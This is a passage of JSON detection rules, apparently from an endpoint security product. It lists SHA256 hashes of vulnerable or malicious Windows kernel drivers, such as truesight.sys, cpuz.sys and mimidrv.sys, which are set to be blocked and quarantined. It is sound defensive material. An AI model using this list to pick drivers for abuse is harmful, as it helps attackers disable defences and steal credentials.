+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977747Z",
+ "creation_date": "2026-03-23T11:45:29.977749Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4",
+ "comment": "Vulnerable Kernel Driver (aka Lv561av.sys) [https://www.loldrivers.io/drivers/47a351ee-8abe-40d8-bc2b-557390fa0945/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ce38a23-d8db-5b66-9565-df1c397d663c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825687Z",
+ "creation_date": "2026-03-23T11:45:30.825689Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825695Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f256356057405d71b89957a70fe19839aefc306a9031a96ad88d0cc9984e316",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ce71100-4a00-534e-ace0-3c5bc3bfe386",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822442Z",
+ "creation_date": "2026-03-23T11:45:30.822444Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822449Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da99d80082f3492080cd036d121d6d017b9e8d09edcd59e099b1755aa7e9be16",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ce988f2-c60d-50c8-b76c-bb80567d8dc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619683Z",
+ "creation_date": "2026-03-23T11:45:29.619685Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619690Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1deae340bf619319adce00701de887f7434deab4d5547a1742aeedb5634d23c6",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cead37d-a579-549a-a769-670133d2de75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823257Z",
+ "creation_date": "2026-03-23T11:45:31.823260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a051ab0a007d473083fac3cb8b7ef1a1a89af0a55b77e1795c5ea3917c4280cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cf3c576-3535-5b70-887e-7f8530b64044",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481197Z",
+ "creation_date": "2026-03-23T11:45:31.481201Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb270e71a7af28e15663fee5aead3ecdf17107d57fe6a3ea70fc47085bfadfeb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cf45311-f53d-532f-87a4-e3545d422448",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825887Z",
+ "creation_date": "2026-03-23T11:45:31.825890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9cdf3495a1bb54e0c4393144d9a03c1a677e44e1a4bd9a25535f11af95055d7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cfa0b06-3d5e-51a9-a287-9c20cc2a4701",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472951Z",
+ "creation_date": "2026-03-23T11:45:30.472954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40da0adf588cbb2841a657239d92f24b111d62b173204b8102dd0e014932fe59",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cfe9432-2983-56d3-9095-235d3d2a22f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472025Z",
+ "creation_date": "2026-03-23T11:45:30.472028Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65deb5dca18ee846e7272894f74d84d9391bbe260c22f24a65ab37d48bd85377",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d005334-b6cc-5a6b-b1bb-5533904dba30",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825888Z",
+ "creation_date": "2026-03-23T11:45:30.825890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "365ab6a51b569492922d452c351c3c2b6a2cca74dd2078d9905bb9065d374bab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d0167f1-3c42-5192-8ea3-64162ac93d73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829079Z",
+ "creation_date": "2026-03-23T11:45:30.829081Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4f8ebedf80fdb13ccff95bfa4dc85feeb9b09e4dc5b4ede71a17e13796e5fe5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d0bed4a-ab1a-539b-b8fb-3ab612a9692e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822237Z",
+ "creation_date": "2026-03-23T11:45:31.822240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a14f1b5d2f9de3246277b7a1257933ade03c6c2e2f6f4a5b28529f23126a706c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d0d8f06-f34e-53bb-a7bc-c7fb849747aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815455Z",
+ "creation_date": "2026-03-23T11:45:31.815457Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eae1c884154b86ecf7bf42672704dafad2c9c276d67da490a127ea8fe17e0ede",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d0db0dd-6418-5ec1-ac67-44a9fb874a38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974592Z",
+ "creation_date": "2026-03-23T11:45:29.974594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3227dc2e8f83258810cf43719f02a8d52648eb17939fddd79fd70155a47305d",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d18ced3-9ca5-5f6b-bf51-e188d0bbb008",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604754Z",
+ "creation_date": "2026-03-23T11:45:29.604756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d22a591-e95e-5534-b3e8-c9efc27060f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469515Z",
+ "creation_date": "2026-03-23T11:45:30.469518Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469526Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab5b4c34bc49b3ae9c6a7607d97b2bd63d9a1b3c669ef18c8865c8a50a3254a9",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d27399a-5782-5e4f-93c0-4ff83d9ba94c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603867Z",
+ "creation_date": "2026-03-23T11:45:29.603884Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.603890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35a12d81f7062a22644b500d91b1603b4f97756ad165c3ea571e7fef55c24162",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d287735-a79a-5370-9984-8e5b12bc423f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616668Z",
+ "creation_date": "2026-03-23T11:45:29.616670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3cb75429944e60f6c820c7638adbf688883ad44951bca3f8912428afe72bc134",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d326022-537d-5b39-b94a-e45fe2370021",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145800Z",
+ "creation_date": "2026-03-23T11:45:31.145802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145807Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c06f28debb4b70eda58fcc200135f50d3dc4fbc7dd0d9f71180cd81fdcc871f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d38ae6d-4d9f-5ed6-ad9f-6132bb960f2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468583Z",
+ "creation_date": "2026-03-23T11:45:30.468586Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "058c84860fb9fefd4c5cec57b6ef9f43146a6509b6894f2a27fb5a2dd16d578b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d4a8c8f-d2ab-5a1d-8b79-38f79dbee7a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150409Z",
+ "creation_date": "2026-03-23T11:45:31.150411Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150416Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "535a9cfd2cd3809db4ed92b8e64769ca9bf10aa9cd75e9e4ae500188706813cb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d4cd469-62d1-58f3-96dd-1355ef03bc42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822362Z",
+ "creation_date": "2026-03-23T11:45:31.822363Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822369Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52ea7d44f5d0945b92a34c705495fa8f8aa9b2f45f2b22598d1e7f5e3f524376",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d4d7869-dab0-5a46-907b-986e430a6bad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984174Z",
+ "creation_date": "2026-03-23T11:45:29.984176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
